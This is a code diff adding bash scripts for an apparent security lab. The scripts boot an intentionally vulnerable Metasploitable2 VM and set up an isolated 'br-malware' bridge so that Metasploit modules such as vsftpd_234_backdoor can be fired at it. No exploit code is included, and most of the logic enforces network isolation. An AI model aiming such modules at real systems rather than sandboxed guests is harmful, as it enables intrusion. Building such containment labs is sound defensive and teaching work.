    -drive file="$CIDATA",format=raw,if=virtio,readonly=on \
-    -netdev user,id=n0,hostfwd=tcp:127.0.0.1:2222-:22 \
+    $(if [[ -n "$BRIDGE" ]]; then \
+        echo -n "-netdev tap,id=n0,ifname=$TAP,script=no,downscript=no "; \
+      else \
+        echo -n "-netdev user,id=n0,hostfwd=tcp:127.0.0.1:$SSH_PORT-:22 "; \
+      fi) \
    -device virtio-net-pci,netdev=n0 \
+    -device virtio-serial-pci,id=cis490vs0 \
+    -chardev socket,id=cis490agent,path="$AGENT_SOCK",server=on,wait=off \
+    -device virtserialport,chardev=cis490agent,name=cis490.guest.agent \
    -nographic \
    -serial unix:"$RUN_DIR/serial.sock",server=on,wait=off \
    -monitor unix:"$MON_SOCK",server=on,wait=off \
--- a/vm/launch_target.sh
+++ b/vm/launch_target.sh
@ -0,0 +1,117 @@
+#!/usr/bin/env bash
+# Boot the Tier-3 *target* VM (the intentionally-vulnerable guest the
+# exploit fires against). Companion to ``launch_demo.sh``, which boots
+# the *idle* Alpine guest used in Tiers 1-2.
+#
+# Networking note: this launcher uses SLIRP usermode networking with
+# ``restrict=on`` plus an explicit ``hostfwd`` for each vulnerable port.
+# That gives us:
+#   - the host can reach the guest's services (for msfrpcd + the
+#     exploit module to drive ``RHOSTS=127.0.0.1``)
+#   - the guest cannot reach the host or the internet (no NAT exit)
+#
+# The host-only ``br-malware`` bridge described in docs/architecture.md
+# replaces SLIRP once the bridge-side pcap collector (source 4) lands —
+# at which point payloads with ``reverse_tcp`` callbacks become viable
+# too. Until then, we restrict module choices to ones that return a
+# shell on the same socket they exploit (e.g. vsftpd_234_backdoor).
+#
+# Run-dir contract (read by run_tier3_demo.py):
+#   $RUN_DIR/qemu.pid
+#   $RUN_DIR/qmp.sock
+#   $RUN_DIR/monitor.sock
+#   $RUN_DIR/serial.sock
+
+set -euo pipefail
+
+REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
+IMAGE="${IMAGE:-$REPO_ROOT/vm/images/metasploitable2.qcow2}"
+SLOT="${SLOT:-0}"
+RUN_DIR="${RUN_DIR:-/tmp/cis490-target-$SLOT}"
+RAM_MIB="${RAM_MIB:-512}"
+# When BRIDGE is set, attach a tap to the host-only bridge instead of
+# using SLIRP. Pcap-feature episodes (source 4) require this.
+BRIDGE="${BRIDGE:-}"
+TAP="${TAP:-cis490target$SLOT}"
+# Ports the host should forward to the guest. Comma-separated host:guest pairs.
+# Default covers the vsftpd module's RPORT. Slot offset makes per-VM
+# fleet runs collision-free (slot 0 → 21, slot 1 → 121, slot 2 → 221, ...).
+PORT_BASE="${PORT_BASE:-$((21 + SLOT * 100))}"
+TARGET_PORTS="${TARGET_PORTS:-${PORT_BASE}:21}"
+# KVM if the host can take it; otherwise fall back to TCG. Cross-arch
+# images (Metasploitable2 is x86-only) on aarch64 hosts will need TCG.
+ACCEL="${ACCEL:-}"
+
+mkdir -p "$RUN_DIR"
+QMP_SOCK="$RUN_DIR/qmp.sock"
+MON_SOCK="$RUN_DIR/monitor.sock"
+PID_FILE="$RUN_DIR/qemu.pid"
+SERIAL_SOCK="$RUN_DIR/serial.sock"
+
+if [[ ! -f "$IMAGE" ]]; then
+    cat >&2 <<EOF
+no target image at $IMAGE
+
+Drop a vulnerable Linux qcow2 there. The canonical choice is
+Metasploitable2 — see docs/sources.md for the download + sha256.
+
+If the image is x86 and your host is not, set ACCEL=tcg explicitly.
+EOF
+    exit 1
+fi
+
+# Build the netdev string. With BRIDGE set we use a tap on the host-only
+# bridge (so source-4 pcap captures the traffic). Without it, SLIRP
+# usermode + restrict=on for the no-egress smoke runs.
+if [[ -n "$BRIDGE" ]]; then
+    NETDEV="tap,id=n0,ifname=$TAP,script=no,downscript=no"
+else
+    NETDEV="user,id=n0,restrict=on"
+    IFS=',' read -ra _PAIRS <<< "$TARGET_PORTS"
+    for pair in "${_PAIRS[@]}"; do
+        host_port="${pair%%:*}"
+        guest_port="${pair##*:}"
+        NETDEV+=",hostfwd=tcp:127.0.0.1:${host_port}-:${guest_port}"
+    done
+fi
+
+# Pick acceleration: explicit override wins; otherwise use KVM if the
+# device is present, else TCG.
+if [[ -z "$ACCEL" ]]; then
+    if [[ -e /dev/kvm && -r /dev/kvm && -w /dev/kvm ]]; then
+        ACCEL="kvm"
+    else
+        ACCEL="tcg"
+    fi
+fi
+
+CPU_FLAGS=()
+if [[ "$ACCEL" == "kvm" ]]; then
+    CPU_FLAGS=(-cpu host)
+fi
+
+AGENT_SOCK="$RUN_DIR/agent.sock"
+
+# snapshot=on so the qcow2 is never mutated — every boot is identical.
+# Second virtio-serial port carries the in-guest agent's telemetry to
+# the host (see vm/guest-agent/). Targets without the agent installed
+# (e.g. unmodified Metasploitable2) leave the device unused — the
+# host-side collector simply gets no rows. Harmless.
+exec qemu-system-x86_64 \
+    -name cis490-target \
+    -machine q35,accel="$ACCEL" \
+    "${CPU_FLAGS[@]}" \
+    -smp 1,sockets=1,cores=1,threads=1 \
+    -m "$RAM_MIB" \
+    -drive file="$IMAGE",format=qcow2,if=virtio,snapshot=on \
+    -netdev "$NETDEV" \
+    -device virtio-net-pci,netdev=n0 \
+    -device virtio-serial-pci,id=cis490vs0 \
+    -chardev socket,id=cis490agent,path="$AGENT_SOCK",server=on,wait=off \
+    -device virtserialport,chardev=cis490agent,name=cis490.guest.agent \
+    -nographic \
+    -serial unix:"$SERIAL_SOCK",server=on,wait=off \
+    -monitor unix:"$MON_SOCK",server=on,wait=off \
+    -qmp unix:"$QMP_SOCK",server=on,wait=off \
+    -pidfile "$PID_FILE" \
+    -display none
--- a/vm/setup_bridge.sh
+++ b/vm/setup_bridge.sh
@ -0,0 +1,56 @@
+#!/usr/bin/env bash
+# Create the host-only ``br-malware`` bridge for Tier-3+ episodes.
+#
+# Properties (from docs/architecture.md):
+#   - Bridge address 10.200.0.1/24 on the host side.
+#   - NO NAT, NO route, NO DNS — guests cannot reach the host or the
+#     internet. The bridge only carries traffic between the host and
+#     the guests on it.
+#   - Lab-host and target VMs both attach via tap devices created by
+#     the launcher.
+#
+# Run as root, ONCE per host. Idempotent — re-running is safe.
+
+set -euo pipefail
+
+BRIDGE="${BRIDGE:-br-malware}"
+BRIDGE_IP="${BRIDGE_IP:-10.200.0.1/24}"
+
+log() { printf '[setup_bridge] %s\n' "$*" >&2; }
+
+[[ $EUID -eq 0 ]] || { log "must run as root"; exit 1; }
+
+if ! command -v ip >/dev/null; then
+    log "iproute2 (`ip`) is required"
+    exit 1
+fi
+
+if ! ip link show "$BRIDGE" >/dev/null 2>&1; then
+    log "creating bridge $BRIDGE"
+    ip link add name "$BRIDGE" type bridge
+    # Disable spanning-tree on the host-only bridge — it isn't needed
+    # and adds startup delay.
+    ip link set "$BRIDGE" type bridge stp_state 0
+fi
+
+ip link set "$BRIDGE" up
+
+# Add the host-side address if not already there.
+if ! ip -4 addr show dev "$BRIDGE" | grep -q "${BRIDGE_IP%%/*}"; then
+    log "adding $BRIDGE_IP to $BRIDGE"
+    ip addr add "$BRIDGE_IP" dev "$BRIDGE"
+fi
+
+# Make sure the kernel does NOT forward between this bridge and any
+# other interface. We don't want a misconfigured net.ipv4.ip_forward
+# to leak the malware bridge to the LAN.
+if [[ "$(cat /proc/sys/net/ipv4/ip_forward)" == "1" ]]; then
+    log "WARNING: net.ipv4.ip_forward=1 — make sure iptmonads / nftables"
+    log "blocks traffic from $BRIDGE to non-loopback devices."
+fi
+
+log "bridge ready: $(ip -4 -br addr show "$BRIDGE")"
+log ""
+log "Launchers can now opt into tap+bridge mode by setting:"
+log "  BRIDGE=$BRIDGE   (tells launch_target.sh to attach a tap to this bridge)"
+log "Default launcher behaviour stays SLIRP usermode for simplicity."